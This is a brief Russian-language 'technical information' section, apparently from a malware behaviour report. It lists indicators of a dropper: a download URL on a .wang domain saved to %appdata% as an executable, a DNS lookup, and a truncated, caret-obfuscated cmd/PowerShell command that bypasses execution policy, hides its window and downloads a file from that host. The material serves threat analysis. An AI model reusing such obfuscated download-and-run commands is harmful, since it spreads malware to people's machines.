Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powe^rShell.EXe^ -^exec^u^tion^pOlicy ByPa^s^S ^-n^o^PrOfI^LE^ -^W^indOWsTY^l^e^ HIDd^En^ ^(NE^w-Ob^JEct Sy^St^EM.neT.W^EBcLiE^nT).^Do^WNLoaDfI^LE^(^'http://transporings...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "powe^rShell.EXe^ -^exec^u^tion^pOlicy ByPa^s^S ^-n^o^PrOfI^LE^ -^W^indOWsTY^l^e^ HIDd^En^ ^(NE^w-Ob^JEct Sy^St^EM.neT.W^EBcLiE^nT).^Do^WNLoaDfI^LE^(^'http://transporings...' (со скрытым окном)